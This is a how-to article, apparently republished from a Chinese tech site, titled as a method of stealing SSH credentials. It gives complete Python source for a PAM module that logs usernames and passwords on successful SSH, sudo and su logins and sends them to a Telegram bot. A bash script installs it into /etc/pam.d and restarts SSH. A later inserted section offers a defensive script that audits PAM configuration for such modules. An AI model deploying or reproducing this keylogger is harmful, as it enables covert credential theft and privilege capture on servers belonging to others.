2025-01-18 update. From: SLTechnology News&Howtos > Development. Shulou (Shulou.com) 06/02 report.
This article explains in detail one method of stealing SSH credentials. The editor shares it for reference; I hope you will have a clear understanding of the relevant knowledge after reading it.
I'm going to introduce you to another way to capture the SSH password. I found this method at ChokePoint, where the author showed how to use Python to create a PAM module that records failed login attempts. All I have to do is change what happens on a successful login. The original script calls the auth_log function when login fails:
    if not check_pw(user, resp.resp):
        auth_log("Remote Host: %s (%s:%s)" % (pamh.rhost, user, resp.resp))
        return pamh.PAM_AUTH_ERR
    return pamh.PAM_SUCCESS
In my script, when the login succeeds, I call a function sendMessage that I defined:
    if not check_pw(user, resp.resp):
        return pamh.PAM_AUTH_ERR
    sendMessage("Connection from host {} user: {} password: {}".format(pamh.rhost, user, resp.resp))
    return pamh.PAM_SUCCESS
This function sends the user, the password and the IP of the connection. The following is the complete code:
import spwd
import crypt
import requests


def sendMessage(msg):
    # Forward the captured login to a Telegram bot
    apiKey = 'BOT-API-KEY'
    userId = 'USERID'
    url = 'https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}'.format(apiKey, userId, msg)
    r = requests.get(url)


def check_pw(user, password):
    """Check the password matches local unix password on file"""
    hashed_pw = spwd.getspnam(user)[1]
    return crypt.crypt(password, hashed_pw) == hashed_pw


def pam_sm_authenticate(pamh, flags, argv):
    try:
        user = pamh.get_user()
    except pamh.exception as e:
        return e.pam_result
    if not user:
        return pamh.PAM_USER_UNKNOWN
    try:
        resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, 'Password:'))
    except pamh.exception as e:
        return e.pam_result
    if not check_pw(user, resp.resp):
        return pamh.PAM_AUTH_ERR
    sendMessage("Connection from host {} user: {} password: {}".format(pamh.rhost, user, resp.resp))
    return pamh.PAM_SUCCESS


def pam_sm_setcred(pamh, flags, argv):
    return pamh.PAM_SUCCESS


def pam_sm_acct_mgmt(pamh, flags, argv):
    return pamh.PAM_SUCCESS


def pam_sm_open_session(pamh, flags, argv):
    return pamh.PAM_SUCCESS


def pam_sm_close_session(pamh, flags, argv):
    return pamh.PAM_SUCCESS


def pam_sm_chauthtok(pamh, flags, argv):
    return pamh.PAM_SUCCESS
I also created a bash script to automate the installation of the SSH keylogger: it installs all the dependencies, writes the module, and configures it in /etc/pam.d/sshd.
#!/bin/bash
# Install dependencies to create a PAM module using python (except for python-pip)
apt-get install python-pam libpam-python python-pip
# Install python dependencies
pip install requests

# Check if the entry for this module already exists in the pam config
if ! grep -Fq "looter.py" /etc/pam.d/sshd
then
    sed -i "/common-auth/a auth requisite pam_python.so looter.py" /etc/pam.d/sshd
fi

code='import spwd
import crypt
import requests


def sendMessage(msg):
    apiKey = "API-KEY"
    userId = "USER-ID"
    data = {"chat_id": userId, "text": msg}
    url = "https://api.telegram.org/bot{}/sendMessage".format(apiKey)
    r = requests.post(url, json=data)


def check_pw(user, password):
    """Check the password matches local unix password on file"""
    hashed_pw = spwd.getspnam(user)[1]
    return crypt.crypt(password, hashed_pw) == hashed_pw


def pam_sm_authenticate(pamh, flags, argv):
    try:
        user = pamh.get_user()
    except pamh.exception as e:
        return e.pam_result
    if not user:
        return pamh.PAM_USER_UNKNOWN
    try:
        resp = pamh.conversation(pamh.Message(pamh.PAM_PROMPT_ECHO_OFF, "Password:"))
    except pamh.exception as e:
        return e.pam_result
    if not check_pw(user, resp.resp):
        return pamh.PAM_AUTH_ERR
    sendMessage("Connection from host {} using the user {} and password {}".format(pamh.rhost, user, resp.resp))
    return pamh.PAM_SUCCESS


def pam_sm_setcred(pamh, flags, argv):
    return pamh.PAM_SUCCESS


def pam_sm_acct_mgmt(pamh, flags, argv):
    return pamh.PAM_SUCCESS


def pam_sm_open_session(pamh, flags, argv):
    return pamh.PAM_SUCCESS


def pam_sm_close_session(pamh, flags, argv):
    return pamh.PAM_SUCCESS


def pam_sm_chauthtok(pamh, flags, argv):
    return pamh.PAM_SUCCESS'

mkdir -p /lib/security/
echo "$code" > /lib/security/looter.py
/etc/init.d/ssh restart
Now, whenever someone successfully logs in to the server, you will receive login information like the following.
It also works for sudo and su; just add the following line

    auth requisite pam_python.so looter.py

to the following two files:

    /etc/pam.d/sudo
    /etc/pam.d/su
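A defender's audit, added here as an example that is neither part of the original post nor of the sshLooter project: it parses PAM configuration text for rules that hand authentication to a script-hosting module such as pam_python.so (the entry the installer above appends to /etc/pam.d/sshd, sudo and su) or to a module loaded from outside the standard library directories, and lists non-.so files in the module directories where looter.py is dropped. The sample sshd stack is constructed; the module directory paths and the set of script-hosting modules are assumptions about a typical Debian-style host.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed sample: an sshd PAM stack after an installer like the one above
# has appended its pam_python.so rule below the common-auth include.
SAMPLE_SSHD_PAM = """\
# PAM configuration for the Secure Shell service
auth    required    pam_nologin.so
@include common-auth
auth requisite pam_python.so looter.py
account required pam_nologin.so
@include common-account
session [success=ok default=bad] pam_loginuid.so
"""

# Assumption: modules that execute external code and so deserve review on a server.
SCRIPT_HOST_MODULES = {"pam_python.so", "pam_exec.so"}

# Assumption: where a Debian-style host keeps its legitimate PAM modules.
STANDARD_MODULE_PREFIXES = ("/lib/", "/usr/lib/", "/lib64/", "/usr/lib64/")

# type   control (a word or a [...] block)   module   optional arguments
PAM_RULE = re.compile(
    r"^\s*(auth|account|password|session)\s+(\[[^\]]*\]|\S+)\s+(\S+)(?:\s+(.*?))?\s*$"
)


def parse_pam_rules(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (type, control, module, args) per rule; comments and @include lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = PAM_RULE.match(line)
        if m:
            rules.append((m.group(1), m.group(2), m.group(3), m.group(4) or ""))
    return rules


def find_suspicious_rules(text: str) -> List[Dict[str, str]]:
    """Flag rules that load a script-hosting module or a module from a non-standard path."""
    findings = []
    for typ, control, module, args in parse_pam_rules(text):
        base = os.path.basename(module)
        reason = None
        if base in SCRIPT_HOST_MODULES:
            reason = "module executes an external script"
        elif os.path.isabs(module) and not module.startswith(STANDARD_MODULE_PREFIXES):
            reason = "module loaded from outside the standard library directories"
        if reason:
            findings.append({"type": typ, "control": control, "module": base,
                             "args": args, "reason": reason})
    return findings


def unexpected_module_files(names: List[str]) -> List[str]:
    """A PAM module directory should hold only shared objects; anything else is worth a look."""
    return sorted(n for n in names if not n.endswith(".so"))


def audit_host(pam_d: str = "/etc/pam.d",
               module_dirs: Tuple[str, ...] = ("/lib/security",
                                               "/lib/x86_64-linux-gnu/security")):
    """Walk the live PAM configuration and module directories; returns {path: findings}."""
    report = {}
    if os.path.isdir(pam_d):
        for svc in sorted(os.listdir(pam_d)):
            path = os.path.join(pam_d, svc)
            if not os.path.isfile(path):
                continue
            with open(path, errors="replace") as fh:
                hits = find_suspicious_rules(fh.read())
            if hits:
                report[path] = hits
    for d in module_dirs:
        if os.path.isdir(d):
            extra = unexpected_module_files(os.listdir(d))
            if extra:
                report[d] = extra
    return report


if __name__ == "__main__":
    import json
    print(json.dumps({"constructed sshd sample": find_suspicious_rules(SAMPLE_SSHD_PAM)}, indent=2))
    print(json.dumps(audit_host(), indent=2))
```

Run it as root on the host to audit every service file under /etc/pam.d; a pam_python.so rule that nobody deployed on purpose, or a stray .py in a module directory, is exactly the footprint the installer above leaves, and the same check belongs in a file-integrity baseline for /etc/pam.d and the module directories.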
Or you can git clone the project directly and follow the instructions in README.md:

    git clone https://github.com/mthbernardes/sshLooter.git

That is all on the method of stealing SSH credentials. I hope the above content can be of some help to you and that you have learned something. If you think the article is good, share it so that more people can see it.